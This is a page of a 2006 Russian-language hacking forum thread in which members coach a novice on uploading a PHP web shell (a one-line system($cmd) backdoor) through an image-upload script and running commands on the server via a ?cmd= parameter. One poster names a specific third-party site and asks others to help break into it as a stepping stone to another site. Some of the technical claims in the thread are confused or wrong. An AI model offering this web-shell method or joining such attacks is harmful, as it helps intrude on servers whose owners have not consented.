ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Зальем файлы на сайт через get_image.php
   
 
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.05.2006, 13:40
KaMiKadZe
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257

Репутация: 103
По умолчанию
Цитата:
Сообщение от Zitt  
Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись
нда я вижу вы богаты знаниями ))
Вообще то wget это для виндовс но если я с ls -la ошибся тогда cat 100% подходит!
А насчет file.php?cmd=
file.php твой файл
?cmd= запрос
Какие команды туда вводить? Смотря какая система если системы виндовс то некоторые команды можешь посмотреть в cmd> help если unix то поищи в google.ru !
 

  #12  
Старый 08.05.2006, 13:50
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Попробовал..опять пишет, что права нужны..
/img/1147031229.php?cmd=ls -la

Что там еще..

http://sait.ru/img/1147007150.php?cmd=uname -a
Так тоже не че не получается..

А на счет залить через "wget сцылка"
Я просто не понял.=)
Последний раз редактировалось djhoof; 08.05.2006 в 13:56..
 

  #13  
Старый 08.05.2006, 14:00
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию
Цитата:
нда я вижу вы богаты знаниями ))
Вообще то wget это для виндовс
Да уж куда мне до вас кул хацкеров )))))) типа на линухе wget нету да??
 

  #14  
Старый 08.05.2006, 14:05
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Парни..попробуйте че нить сделать
http://www.modnoblya.h15.ru/get_image.php
А то что то у меня голова от всего этого сейчас лопнет...
Этот сайт..просто ключик к другому..

Думаю совместными усилиями можно что-нить придумать..
Последний раз редактировалось djhoof; 08.05.2006 в 14:54..
 

  #15  
Старый 08.05.2006, 16:45
KaMiKadZe
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257

Репутация: 103
По умолчанию
Цитата:
Сообщение от Zitt  
Да уж куда мне до вас кул хацкеров )))))) типа на линухе wget нету да??
Есть но там если не ошибаюсь ему замена команда CAT )
 

  #16  
Старый 08.05.2006, 16:53
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
А потом расскажите как да что..просто сам тоже хочу попробовать..))
А то никакого удовольствия..)
 

  #17  
Старый 09.05.2006, 22:31
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
неужели некому помочь?
 

  #18  
Старый 10.05.2006, 09:41
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Цитата:
Сообщение от alex-19841  
Попробуй
http://site.ru/index.php?cmd="php shell.jpg"
Это по идеи работает, но к сожалению там вылетает такая вот надпись - The html tags you attempted to use are not allowed
 

  #19  
Старый 10.05.2006, 10:04
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Цитата:
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда
Короче я беру shell.php в него вставляю эту строчку в самый верх <? system($cmd); ?>, так???
заливаю shell и пробую его открыть через http://site.ru/img/fail.php?cmd=команда
Что там за команды должны быть..

Я че то видимо отдален от всего этого..но мне все же интересно.
Последний раз редактировалось djhoof; 10.05.2006 в 10:18..
 

  #20  
Старый 10.05.2006, 10:45
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Когда заливаешь туда файл расширение сразу меняеться на gif. А ты запускаешь файл php. У тебя наверно не фига не получиться.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
 
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ